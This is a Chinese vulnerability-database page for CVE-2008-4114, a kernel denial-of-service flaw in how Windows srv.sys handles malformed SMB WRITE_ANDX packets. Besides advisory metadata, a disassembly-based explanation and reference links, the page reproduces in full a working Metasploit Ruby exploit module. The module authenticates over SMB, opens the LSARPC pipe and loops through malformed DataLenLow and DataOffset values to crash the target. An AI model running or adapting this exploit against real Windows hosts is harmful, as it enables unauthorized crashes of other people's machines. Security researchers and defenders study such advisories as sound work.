Microsoft Windows SMB WRITE_ANDX处理拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116119 漏洞类型 资源管理错误
发布时间 2008-09-15 更新时间 2009-01-27
CVE编号 CVE-2008-4114 CNNVD-ID CNNVD-200809-231
漏洞平台 Windows CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/6463
https://www.securityfocus.com/bid/31179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-231
|漏洞详情
Windows是微软发布的非常流行的操作系统。 Windows的srv.sys驱动处理畸形WRITE_ANDX SMB报文的方式存在内核拒绝服务漏洞,如果未经认证的远程攻击者能够向使用命名管道端点的接口发送WRITE_ANDX报文的话,就可以触发这个漏洞。 Srv.sys是用于处理SMB报文的驱动。报文被解析后,会通过合适的驱动路由。以下是srv.sys解析报文某些重要字段的方式: Módulo: srv.sys Vista SP1 PAGE:00048583 movzx ecx, word ptr [ebx+17h] ; Packet. DataOffset PAGE:00048587 mov [ebp+var_50], ecx PAGE:0004858A mov eax, [esi+78h]; Packet PAGE:0004858D add eax, ecx; Packet.Data[] PAGE:0004858F mov [ebp+VirtualAddress], eax PAGE:00048592 mov eax, [esi+6Ch] PAGE:00048595 mov eax, [eax+10h] PAGE:00048598 sub eax, ecx; Real packet len - DataOffset PAGE:0004859A movzx edi, word ptr [ebx+15h]; Packet.DataLen PAGE:0004859E cmp edi, eax PAGE:000485A0 jbshort loc_485A4 PAGE:000485A2 mov edi, eax 在这部份代码中,驱动应添加检查,以防在偏移与报文真实大小不一致时仍然继续。之后srv.sys构建(或重新使用)FILESYSTE_CONTROL IRP(0xD),其IOCTL为0x119FF8(FSCTL_PIPE_INTERNAL_WRITE, METHOD_BUFFERED),然后通过调用IofCallDriver将这个IRP发送给正确的驱动。IRP包含有报文,但如果考虑到报文的内部字段,这并不意味IRP在内存使用方面保持一致。 Módulo: srv.sys Vista SP1 PAGE:00048C90 pushebx
|漏洞EXP
require 'msf/core'

module Msf
module Exploits
module Test


class BugTest < Msf::Exploit::Remote


	include Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'test exploit',
			'Description'    => 	
				"tests",
			'Author'         => 'tests',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 0 $',
			'Arch'           => 'x86',
			'Payload'        =>
				{
					'Space' => 1000
				},
			'Targets'        => 
				[
					[
						'Windows VISTA',
						{
							'Platform' => 'win'
						}
					],
				],
			'DefaultTarget' => 0))
	end


	def subexploit(dlenlow, doffset,fillersize)

		print_line("1")

            datastore['SMBUser']='testuser'
            datastore['SMBPass']='testuser'
            datastore['SMBDomain']='COBAYA'
		datastore['SMBName']='COBAYA' 

		print_line("2")
		
		connect()

		print_line("3")

		smb_login()

		print_line("4")
 
               pkt = CONST::SMB_CREATE_PKT.make_struct

		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807

		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

		pkt['Payload']['SMB'].v['WordCount'] = 24
		
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileNameLen'] = 14
		pkt['Payload'].v['CreateFlags'] = 0x16
		pkt['Payload'].v['AccessMask'] = 0x2019f  # Maximum Allowed
		pkt['Payload'].v['ShareAccess'] = 7
		pkt['Payload'].v['CreateOptions'] = 0x400040
		pkt['Payload'].v['Impersonation'] = 2       
		pkt['Payload'].v['Disposition'] = 1
		pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"


		simple.client.smb_send(pkt.to_s)

		print_line("5")

		ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)
		
		pkt = CONST::SMB_WRITE_PKT.make_struct

		data_offset = pkt.to_s.length - 4

		print_line("6")
		
		filler = Rex::Text.rand_text(fillersize)

		print_line("7")

		pkt['Payload']['SMB'].v['Signature1']=0xcccccccc
		pkt['Payload']['SMB'].v['Signature2']=0xcccccccc
		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807
		pkt['Payload']['SMB'].v['WordCount'] = 14
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
		pkt['Payload'].v['Offset'] = 0
		pkt['Payload'].v['Reserved2'] = -1
		pkt['Payload'].v['WriteMode'] = 8
		pkt['Payload'].v['Remaining'] = fillersize
		pkt['Payload'].v['DataLenHigh'] = 0
		pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
		pkt['Payload'].v['DataOffset'] = doffset #<====
		pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
		pkt['Payload'].v['ByteCount'] = fillersize#<====
		pkt['Payload'].v['Payload'] = filler

		print_line("8")
		
		simple.client.smb_send(pkt.to_s)
		
		print_line("9")

	end

	def exploit
		
		k=72
		j=0xffff
		while j>10000
			i=0xffff
			while i>10000
				begin
					print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
					subexploit(i,j,k)
				rescue
					print_line("rescue")
				end
				i=i-10000
			end
			j=j-10000
		end
		
	end

end

end
end
end

# milw0rm.com [2008-09-15]
|受影响的产品
Nortel Networks Self-Service WVADS 0 Nortel Networks Self-Service VoiceXML 0 Nortel Networks Self-Service Speech Server 0 Nortel Networks Self-Service Peri Workstation 0 Nortel Networks S
|参考资料

来源:US-CERT:TA09-013A
名称:TA09-013A
链接:http://www.us-cert.gov/cas/techalerts/TA09-013A.html
来源:MS
名称:MS09-001;PatchInformation
链接:http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
来源:XF
名称:win-writeandx-dos(45146)
链接:http://xforce.iss.net/xforce/xfdb/45146
来源:MISC
链接:http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm
来源:SECTRACK
名称:1020887
链接:http://www.securitytracker.com/id?1020887
来源:BID
名称:31179
链接:http://www.securityfocus.com/bid/31179
来源:BUGTRAQ
名称:20080914MicrosoftWindowsWRITE_ANDXSMBcommandhandlingKernelDoS
链接:http://www.securityfocus.com/archive/1/archive/1/496354/100/0/threaded
来源:MISC接:http://www.reversemode.com/index.php?option=com_content&task=view&id=54&Itemid=1
来源:MILW0RM
名称:6463
链接:http://www.milw0rm.com/exploits/6463
来源:VUPEN
名称:ADV-2008-2583
链接:http://www.frsirt.com/english/advisories/2008/2583
来源:SECUNIA
名称:31883
链接:http://secunia.com/advisories/31883
来源:OVAL
名称:oval:org.mitre.oval:def:6044
链接:http://oval.mitre.org/repository/data/getDef?id=oval:or